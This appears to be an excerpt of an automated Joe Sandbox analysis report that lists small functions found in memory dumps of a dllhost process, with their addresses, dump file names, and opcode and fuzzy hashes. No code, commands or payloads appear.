Opcode ID: 0999251126483c1e620eec71faeeb427d7fbb0badf19b8043d0f09433cdc94f0
Instruction ID: 69b5d55811151abb38bd9cbbe132179c7df9207af8e01116037548a26555ad03
Opcode Fuzzy Hash: 0999251126483c1e620eec71faeeb427d7fbb0badf19b8043d0f09433cdc94f0
Instruction Fuzzy Hash: 8BA024100DD34C0C010113D13001751374C0C4343CFC100C1DC0D05513054C7514005D

Function 04BC3420 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbf99c0ea2e4fc2f7b36e2244f60517b46494bdc1e17185a244fa9be1afb4652
Instruction ID: 54032c595440d05bd04f85c2fe94e0d39772a80e46c303a20d279033f4ceb67d
Opcode Fuzzy Hash: fbf99c0ea2e4fc2f7b36e2244f60517b46494bdc1e17185a244fa9be1afb4652
Instruction Fuzzy Hash: 23B0125200434C20460051E515098A67B9C09144107004422764456501C428E16051B8

Function 04BC098D Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b702c37566daa31a59c526a02e101b78c9d138a2231c0a28733c599f7bd2f9b
Instruction ID: d1a951a4bc77aaf8164c3e5e359f6e6e7ad348f5a513e19dfb758de627e45ab5
Opcode Fuzzy Hash: 2b702c37566daa31a59c526a02e101b78c9d138a2231c0a28733c599f7bd2f9b
Instruction Fuzzy Hash: BBC04C74E05244CBEB44AFE4C15839C7AA1AB45304F904419940AAB394EA791444CB41

Function 04BC057C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0fe161a6ff3625c0fdcc812cff060061b222ee0215ba935de78900ab72c8748
Instruction ID: bfd238b0ad17b45036a4355ede400e49676bd4154b4b6092921b8f23c4642c04
Opcode Fuzzy Hash: e0fe161a6ff3625c0fdcc812cff060061b222ee0215ba935de78900ab72c8748
Instruction Fuzzy Hash: FDC04C74E09248CBEB94AFF4915839C7AA1AB45304F90451D9406A7395EE7819449B51

Function 04BC2608 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20626c1b07bea1b33d117201c4de8fef3cb883eebc81cfd60ee83f42bdb2a49e
Instruction ID: 0ca9454c7243953b4e8c8e84208a54a141a570e0e8c9fa4162bfbba784800161
Opcode Fuzzy Hash: 20626c1b07bea1b33d117201c4de8fef3cb883eebc81cfd60ee83f42bdb2a49e
Instruction Fuzzy Hash: 9BB0123104130949C7301170A401220320C4F4150AE1000F9550C05B02D93AA0404049

Function 04BC4BF0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34cdfb2d726d774bbf0544b86d33f30fd8eec6e75293085b97fa69babb89c65c
Instruction ID: 0f9716fe63939af58a9265a27de3b8065574f038f7b7476dccf1a27f7d448775
Opcode Fuzzy Hash: 34cdfb2d726d774bbf0544b86d33f30fd8eec6e75293085b97fa69babb89c65c
Instruction Fuzzy Hash: 88B0123208030CA787022A71E4018067B1D9B212547908039E504085108737E9A1D5D4

Function 04BC33D2 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579a2269066efc5ff38f1ba097698c7477ff14e29c347948853eef1098c53e5a
Instruction ID: 44e669ddfa4d9211a26bc153884aedf9f7ce20188e29d6216d98e1341ba314d2
Opcode Fuzzy Hash: 579a2269066efc5ff38f1ba097698c7477ff14e29c347948853eef1098c53e5a
Instruction Fuzzy Hash: 15B01235ACC2CD19CF1246B228D95CC2F11099111472842AECC8E57DB3C14A40174E01

Function 04856AE0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e53e667c812a6a718fbf4756a9e12571af95fdac537f418c193bf419fd828e
Instruction ID: 7a37bd59c523511826c5d1c55078843e9b1dcd39b295030e9dd2ce83600917bf
Opcode Fuzzy Hash: 41e53e667c812a6a718fbf4756a9e12571af95fdac537f418c193bf419fd828e
Instruction Fuzzy Hash: D4A02232082B0C83C20022B02000030B38C8A0200C3E200B8830C08F202AB3F0A0808C

Function 048569A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction ID: ce9f0d320568e7aeddd1da0d443e20918fc001d358bb9c195afdc7c1ad0b123c
Opcode Fuzzy Hash: c2b739e6143de4b2e80f1910f2a15913308529585e9a6837397fe98f9abcd8c9
Instruction Fuzzy Hash: 32A011300002088BC200ABA8E008EA033ECAB08A08F0000F0A20C8BA228A22B8008A82

Function 0485A2A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004858000.00000040.00000800.00020000.00000000.sdmp, Offset: 04858000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4858000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc24f4d7ec29cbee2fc55f6bf05743e6b25731d646484f61f3069516316c298
Instruction ID: 8552c30c813ee26900958bd9350a345fe23d6b1fe402bb311051d99ee373c21a
Opcode Fuzzy Hash: abc24f4d7ec29cbee2fc55f6bf05743e6b25731d646484f61f3069516316c298
Instruction Fuzzy Hash: 73A02238000A0C8B00C033EC380A02CB32CAC8000A3C00802A80C800232FE2B820C8A3

Function 04BC58F0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4d4bccdaf329cf7f456e6e2c634be80947c835beb1f481b5e99fa880fa0e3a
Instruction ID: 67cd4ef4807ed7b20ca33bd35e6eb993887e59d786f0c624f21142b207e36163
Opcode Fuzzy Hash: 7c4d4bccdaf329cf7f456e6e2c634be80947c835beb1f481b5e99fa880fa0e3a
Instruction Fuzzy Hash: 61A022300C2B0C82C20823B0B002838338C880000E3C000B8820C08A200E3FE0A28080

Function 04BC2420 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1750118544fe7b6166f166c58435cfbf8769eff409cbb76085b2593dec4ee13
Instruction ID: 2d43d2e521c6afd9e0fe391455c0d34ef07eef17d929bed70354d3f3405c3d11
Opcode Fuzzy Hash: c1750118544fe7b6166f166c58435cfbf8769eff409cbb76085b2593dec4ee13
Instruction Fuzzy Hash: 56A024310C014C33C5001753FC01C5D7F4CC7111D07404031F504040104F37DC7050D4

Function 04BC6630 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff385c82aae1e0de7645cbdc26bf339e656d9e99bcbdfa82f76dcb12f75e0b6
Instruction ID: 693d31a0bf3130badd23e29190530a0cc66f50ccabd944d7972a87933a97ec6f
Opcode Fuzzy Hash: 6ff385c82aae1e0de7645cbdc26bf339e656d9e99bcbdfa82f76dcb12f75e0b6
Instruction Fuzzy Hash: 20A02230082F0C828A0023F0A002C28B3AC8A0020C3C000F88A0C08B20AA3BE0A08080

Function 04BC4A18 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e848b363244e38d4d5e053d78df3e7bf0af596d3af37526be660a81811fbc6
Instruction ID: e5a44162276bd32870ce861ad1f8e51848cab2a1e8bd4af9ad81987fe1468032
Opcode Fuzzy Hash: 54e848b363244e38d4d5e053d78df3e7bf0af596d3af37526be660a81811fbc6
Instruction Fuzzy Hash: 15A022300C2B0C828A0032F0200282833AC080030C3E000BC820C0AA208A3FE0E0C0A0

Function 04BC7260 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19d4d8ea2eca7a48bacc2e9099f85c11147ba973e857a49672c5aac00439c1fa
Instruction ID: 75bf03ea6ce1ff2760f2ae72fe2a58cacb78d1fac0d5cac48f0ad20936c1a0d0
Opcode Fuzzy Hash: 19d4d8ea2eca7a48bacc2e9099f85c11147ba973e857a49672c5aac00439c1fa
Instruction Fuzzy Hash: 38A02230082B0C82830322F33202022338C088000C3A000BC820C08A220A3BE8A08088

Function 04BC4BB0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 004d1bb2edad13e925489463c5ff078654cf911b035299814da1f5c9392d403d
Instruction ID: 8596809cf8374293dc2939df640677e72cccd552fdd7552ba0f8da28af302fe2
Opcode Fuzzy Hash: 004d1bb2edad13e925489463c5ff078654cf911b035299814da1f5c9392d403d
Instruction Fuzzy Hash: E8A02230002F0C8A820023B22A02020338C080000CBA000FC820C08A208A3BE0A08088

Function 04BC4B90 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99c44fba7832fce9d28e2ff2942200b38e57f8c9aa999a657213db950bc4b348
Instruction ID: 54fb5bef0efc27399d65a23e76701688cab13b65dd0ae7136aff6a711bb8a2a0
Opcode Fuzzy Hash: 99c44fba7832fce9d28e2ff2942200b38e57f8c9aa999a657213db950bc4b348
Instruction Fuzzy Hash: 86A02230002F0C8A820022B02002020338C880000EBA000FCC20C08A208A3BE0A08088

Function 04BC2790 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b026cba870b3a88ac8caf653d7bcaeeaf5039602686ffdc60a077f0a38adb50
Instruction ID: acdba6dced4c7f58620bea4d02c60d2046efa6649bdaf4a32b9902de298d3d6b
Opcode Fuzzy Hash: 9b026cba870b3a88ac8caf653d7bcaeeaf5039602686ffdc60a077f0a38adb50
Instruction Fuzzy Hash: FEA02230002B0C82820022F3220C020B38C0A0220C38000BA8A0C08F208A33E0A88288

Function 04BC6BF8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d17712d3f0b13401811d3b299501c14b1aade46a2b5e67631ce69e29e21aafc
Instruction ID: 644968df4e69c46d048d61aa86f82b925827d2e99de7c4068e53dc8183ad19cb
Opcode Fuzzy Hash: 7d17712d3f0b13401811d3b299501c14b1aade46a2b5e67631ce69e29e21aafc
Instruction Fuzzy Hash: C0A02230002B0C8F820022B0320202033AC3A0200C38200FAA20C08F200A33F0A0C08E

Function 04BC6B28 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 772c00f124f8a9745648e6e9373966a2578c616c023b476b8ea5cdc2015bb1c2
Instruction ID: c4a237334c0eca0481bcc9b62410a01b1af46ec138676287ce15d339673a9498
Opcode Fuzzy Hash: 772c00f124f8a9745648e6e9373966a2578c616c023b476b8ea5cdc2015bb1c2
Instruction Fuzzy Hash: BBA022300C2B0C838A0022F0B003828338C088000C3E080FC820C08A220A3BE8E0C2C0

Function 04BC2318 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 106c4806d359b960c0a73b4e56225c25c658f50f0938895e5639c84c88ebf16b
Instruction ID: 8064b321768082090e24b505958ce4423f99220c7bb9e0c7ec83881d3a3cb19e
Opcode Fuzzy Hash: 106c4806d359b960c0a73b4e56225c25c658f50f0938895e5639c84c88ebf16b
Instruction Fuzzy Hash: 16A0243100C30C3745005541FC00C457F0C47313507004033F5040C511CF33547050DC

Function 04856C48 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a71a6dd86c62e6634d0ef5f90f98c85e53b087b1f8e6af08c1ff504e38332d0
Instruction ID: e57354dde3fec212bf98a2b796b090a8f4e4701070449799e9b6f890f06359f7
Opcode Fuzzy Hash: 3a71a6dd86c62e6634d0ef5f90f98c85e53b087b1f8e6af08c1ff504e38332d0
Instruction Fuzzy Hash:

Function 0485F6D8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3aa8f87c75e8469e6d0a4aafbca7310bc34d69b4af3da65df07eaf514dd202a
Instruction ID: 59550be9a9f2389136b791784b27d15fa304775db72fca1d2949a4ddc35cad81
Opcode Fuzzy Hash: c3aa8f87c75e8469e6d0a4aafbca7310bc34d69b4af3da65df07eaf514dd202a
Instruction Fuzzy Hash:

Function 0485EEE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5598a2dfce6bcd49ec3a5a0a07283a3dbad36fef8957a7fc1525430a58ee4678
Instruction ID: 6f55f2ec6c044a33beb2a51579f617e805c186c833549e067b6e6bc9fbdabd89
Opcode Fuzzy Hash: 5598a2dfce6bcd49ec3a5a0a07283a3dbad36fef8957a7fc1525430a58ee4678
Instruction Fuzzy Hash: B090223000030CCB00002F803808088330CE000C223800000A20C002000E22200080C8

Function 0485DE00 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03cd680a47bad63938f28c323e3fbb0e4d7ee67f1cea3a6430be369a4dc710e7
Instruction ID: 1d1fcd6e751b36ed1c7b36ad0e03c57b68979ad38b3770e70843e5ca3dfdfd6b
Opcode Fuzzy Hash: 03cd680a47bad63938f28c323e3fbb0e4d7ee67f1cea3a6430be369a4dc710e7
Instruction Fuzzy Hash: CB90223000020C8B020023803808080B30CA0000003800000A00C020028A20E8008088

Function 0485E018 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe25382dc4387861d632f06b316ab80a6aef87f2340c896e345901a5bd920e97
Instruction ID: e6c7e2f0f99832c52a1b4c0691f2aa540cc5f63328810c89bd4734eef8738cae
Opcode Fuzzy Hash: fe25382dc4387861d632f06b316ab80a6aef87f2340c896e345901a5bd920e97
Instruction Fuzzy Hash: D790047514470CCF454037D57D0D555F75CF5455157D14051F50D41511DF757510C7D5

Function 0485F278 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f68e299b0d40e1dd9060aa4ba0a58ceac0bc636ba01ce3e8162db410e03c43
Instruction ID: 3ea9e811be99b730fa6b6334e8eb30581383d1e865ba310b7e29a0613872880b
Opcode Fuzzy Hash: c4f68e299b0d40e1dd9060aa4ba0a58ceac0bc636ba01ce3e8162db410e03c43
Instruction Fuzzy Hash: 1E90023544460ECB458467957909559775CA5455157800055A60D415125E556410859D

Function 04BC70B8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6291dd9a722a8622da2249a35085c7b42fd8f0cf0ad0000808dfb1d69ed530
Instruction ID: d2ba354928ebc8466cdac08d9fddcfaa4aad8309bbb3a6d89e6a1eb065c1bd46
Opcode Fuzzy Hash: dd6291dd9a722a8622da2249a35085c7b42fd8f0cf0ad0000808dfb1d69ed530
Instruction Fuzzy Hash: 90900239044E0C8B464027957819659775CB545615BD44051A50D415166A55641485D5

Function 04BC48B0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d894c18fefc327310118918052feb96474430de37d306c6e7a426a355dc94ab2
Instruction ID: 0971e83536a80fbe5453dcd33f3c68d4d739f7b388ba398abf512ba7326524a5
Opcode Fuzzy Hash: d894c18fefc327310118918052feb96474430de37d306c6e7a426a355dc94ab2
Instruction Fuzzy Hash: AC900235044A0CCF494027957909569775DA5455197810051B91D455135A5564208595

Function 04BC24A0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d67a8edce890e3276f4031392d4531c3edc6d04cdae66304131fd1fa4619bf
Instruction ID: 1f884a5f70b80e05e7213e1b9b7baccc0a0bebe2406b24fa8216c5de8f83ac07
Opcode Fuzzy Hash: d6d67a8edce890e3276f4031392d4531c3edc6d04cdae66304131fd1fa4619bf
Instruction Fuzzy Hash: AD90023504460D8B46502795790D556775CA5455157800151E94D415915A6974108695

Function 04BC5890 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b542d8a7f6c0bc1424f24fbe62493680062d9784f3f369d39eafac9b441f3dc0
Instruction ID: 7ba7b5723802e5a56d09b9657c3712e2f97c0fcb0b07cdc7134d65b32f34ebef
Opcode Fuzzy Hash: b542d8a7f6c0bc1424f24fbe62493680062d9784f3f369d39eafac9b441f3dc0
Instruction Fuzzy Hash:

Function 04BC5C80 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa83230f91309c26999b58762461bb0c37a0dd574ff415588de570e987b489e
Instruction ID: 0ecc620874a8834ee3c661cf339ccc209d2034f1162c6a22204063128044ab8f
Opcode Fuzzy Hash: cfa83230f91309c26999b58762461bb0c37a0dd574ff415588de570e987b489e
Instruction Fuzzy Hash: 5E900236444A0D8B464027957809659775CB5455197C40051A60E415125A55641085D9

Function 04BC3C80 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf13f33f462b662ee777b5a9f9e18b1f6c53990c1737fb460dc553d2fb207e8
Instruction ID: 731de4737f0f3878ace6fe0e659b6be9151bae47b5c51dbb3bef6392c93ba7bc
Opcode Fuzzy Hash: abf13f33f462b662ee777b5a9f9e18b1f6c53990c1737fb460dc553d2fb207e8
Instruction Fuzzy Hash: 7A900235044A0CDB45402795B80969D775CA5465267801051A50D415125A5564508595

Function 04BC60D0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e7fe34199f68b29030862d9bf2746685375cb5ab2a26528711303bda62d286
Instruction ID: bce68a7dc9a9fdb74f04d748625265b78a55a571ad0cecaeb7d61d3e897e52ce
Opcode Fuzzy Hash: 77e7fe34199f68b29030862d9bf2746685375cb5ab2a26528711303bda62d286
Instruction Fuzzy Hash:

Function 04BC6C18 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb9ec3c890eb35c414e8bf537581bf8900cf77351f7a570503721231079a68a
Instruction ID: 48e36f36515fd2d0531c037fdbc179b4df87aba96bc72c97a7301473e1829086
Opcode Fuzzy Hash: fcb9ec3c890eb35c414e8bf537581bf8900cf77351f7a570503721231079a68a
Instruction Fuzzy Hash: F7900235044B0C9F4940279578095A9775DA5455267810055B50D415125A5568508595

Function 04BC4C18 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3ba04e058a9767d3769a6009ca5448573fed4e590dfe3b5b86b74ae40fe7d5
Instruction ID: c10d0a67c2e0dc3302ccfab2fa876e4a99f74d6f6fc8fa72eac5985ca9b59ad1
Opcode Fuzzy Hash: 9e3ba04e058a9767d3769a6009ca5448573fed4e590dfe3b5b86b74ae40fe7d5
Instruction Fuzzy Hash: 0C900235044A0CCF454027957909569779DA5495157810051B50D455125A55B4108A95

Function 04BC4870 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc65ba667f5bf5b021334168bb9aa6728ca0a37a436f2f346c72629baaf89a15
Instruction ID: 7eea622374b98f37a7c5f9596a27a4acc806b315631e482dfe9638dff18a2a65
Opcode Fuzzy Hash: dc65ba667f5bf5b021334168bb9aa6728ca0a37a436f2f346c72629baaf89a15
Instruction Fuzzy Hash:

Function 04BC6C68 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7f97630ef51dafa6f9734627432bac72d38d41c55b37e600de6cf8db14dbcc7
Instruction ID: 42f98092027e81b620d8d0f45c36bb89cc20670921e841b6a413c0cbd86dbdce
Opcode Fuzzy Hash: a7f97630ef51dafa6f9734627432bac72d38d41c55b37e600de6cf8db14dbcc7
Instruction Fuzzy Hash: 1E900235045A0CCF45502B95790D569775EA5555157810051A60D455125A5564108595

Function 04BC49B8 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ea1e039c7f4488c8162d1b9416280b196a24b46d599b9ba4013355b9f30fa3
Instruction ID: 48790c046d85d210859dbf828c3183cdc4472ffec6893d08742ccef79d7a4541
Opcode Fuzzy Hash: 29ea1e039c7f4488c8162d1b9416280b196a24b46d599b9ba4013355b9f30fa3
Instruction Fuzzy Hash:

Function 04BC6120 Relevance: .0, Instructions: 5COMMON

